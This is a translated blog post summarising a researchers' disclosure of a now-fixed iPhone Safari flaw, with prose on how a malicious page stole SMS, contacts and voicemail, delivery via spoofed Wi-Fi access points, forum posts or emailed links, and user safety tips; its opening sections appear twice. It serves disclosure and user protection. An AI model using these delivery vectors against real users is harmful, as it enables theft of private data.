iPhone. We find vulnerabilities
Note: Below is a translation of the note “Exploiting the iPhone” , which reveals some details of the recently discovered and already fixed vulnerabilities in the iPhone and offers a couple of practical tips for avoiding them in the future.
Update: Apple has released an update that fixes vulnerabilities discovered. To learn the details of finding one of the vulnerabilities, just go to our blog .
')
Details on BlackHat: Charlie Miller presented details of the exploit on BlackHat , which took place in Las Vegas on August 2. This presentation is also available at this address .
Preliminary technical description: a preliminary document describing the attack is available at this address . The full version is expected after August 2 ( approx .: apparently, it was never posted ).
An article in the New York Times: the story of the work done was published in the New York Times .
Shortly after the iPhone was released, a group of security researchers from Independent Security Evaluators decided to test how difficult it would be for a remote attacker to gain access to private information stored on this device. Within two weeks of part-time work, we were able to detect a vulnerability, develop a toolchain for interacting with the iPhone architecture (including some of the utilities were taken from the # iphone-dev community) and create a prototype of the exploit that was able to transfer files from a custom iPhone to a remote attacker. We notified Apple of the discovered vulnerability and offered an update for the software. Apple is currently considering this proposal ( approx .: as stated above, Apple did release the official version of the update ).
A member of our group, Charlie Miller, presented all the details of detecting a vulnerability and creating an exploit on BlackHat on August 2. Information on the site will be updated to take into account all the changes until only general information about the exploit for iPhone has been published.
The exploit is transmitted through a malicious web page opened in Safari on the iPhone. There are several potential opportunities that an attacker can use to force a victim to open such a web page. Consider the following examples.
When Safari on the iPhone opens a malicious page, arbitrary code included in the exploit is executed with administrator rights. In our prototype, this code reads the SMS message log, address book, call history, and voicemail data. Then he sends all this information to the attacker. However, in place of this code can be quite arbitrary option, which is able to use any features of the iPhone. For example, he can send user passwords from e-mail, send text messages that subscribe the user to paid services, or make an audio recording that will be transmitted to the attacker.
We notified Apple of this vulnerability and offered a fix for it. Hopefully, they will include it in the future updates for the iPhone. In order to protect yourself from this and other similar vulnerabilities in the future, you should follow the following rules (both for iPhone and for other devices).
I thank those who took the time and read the translation. I would welcome any comments. If you have additional information on this topic, please share it. Thank you for your attention.
Update: Apple has released an update that fixes vulnerabilities discovered. To learn the details of finding one of the vulnerabilities, just go to our blog .
')
Details on BlackHat: Charlie Miller presented details of the exploit on BlackHat , which took place in Las Vegas on August 2. This presentation is also available at this address .
Preliminary technical description: a preliminary document describing the attack is available at this address . The full version is expected after August 2 ( approx .: apparently, it was never posted ).
An article in the New York Times: the story of the work done was published in the New York Times .
Welcome
Shortly after the iPhone was released, a group of security researchers from Independent Security Evaluators decided to test how difficult it would be for a remote attacker to gain access to private information stored on this device. Within two weeks of part-time work, we were able to detect a vulnerability, develop a toolchain for interacting with the iPhone architecture (including some of the utilities were taken from the # iphone-dev community) and create a prototype of the exploit that was able to transfer files from a custom iPhone to a remote attacker. We notified Apple of the discovered vulnerability and offered an update for the software. Apple is currently considering this proposal ( approx .: as stated above, Apple did release the official version of the update ).
A member of our group, Charlie Miller, presented all the details of detecting a vulnerability and creating an exploit on BlackHat on August 2. Information on the site will be updated to take into account all the changes until only general information about the exploit for iPhone has been published.
How it works
The exploit is transmitted through a malicious web page opened in Safari on the iPhone. There are several potential opportunities that an attacker can use to force a victim to open such a web page. Consider the following examples.
- The attacker controls the wireless access point. Since iPhones recognize access points by their name (SSID), it’s enough for a user to be near an access point controlled by an intruder. If it has the same name (and encryption type) as the access point that the user trusts and adds before, then the iPhone automatically uses this malicious access point. This will allow the attacker to add the exploit code to an arbitrary page viewed by the user, simply by replacing the requested page with the page with the exploit.
- Insufficient security settings on the forum. If the code of the software on the forum does not provide an adequate level of processing of data received from users, then they can download the potentially malicious code into their messages. Thus, an attacker can cause an exploit to be performed in any browser on the iPhone when the message page is opened in it. (However, this will require some minor changes to our prototype exploit.)
- Link sent in a letter or by SMS. If an attacker can trick a user into opening a website, the attacker simply inserts the exploit code on the home page of this website.
When Safari on the iPhone opens a malicious page, arbitrary code included in the exploit is executed with administrator rights. In our prototype, this code reads the SMS message log, address book, call history, and voicemail data. Then he sends all this information to the attacker. However, in place of this code can be quite arbitrary option, which is able to use any features of the iPhone. For example, he can send user passwords from e-mail, send text messages that subscribe the user to paid services, or make an audio recording that will be transmitted to the attacker.
Tips
We notified Apple of this vulnerability and offered a fix for it. Hopefully, they will include it in the future updates for the iPhone. In order to protect yourself from this and other similar vulnerabilities in the future, you should follow the following rules (both for iPhone and for other devices).
- You go only to those sites that you trust. If you do not go to the attacker's website, you will eliminate one of the potential possibilities of the attack itself.
- Use only those WiFi networks that you trust. If intruders control your Internet connection, they can add malicious code to any site you visit.
- Do not open links from emails. Many of the currently known viruses send links to malicious websites in emails that may look like they were sent on behalf of trusted friends.
Related Links
- Found a hole in the iPhone software
- Apple iPhone. First update
- Multiple vulnerabilities in Apple iPhone
I thank those who took the time and read the translation. I would welcome any comments. If you have additional information on this topic, please share it. Thank you for your attention.
Source: https://habr.com/ru/post/31229/
All Articles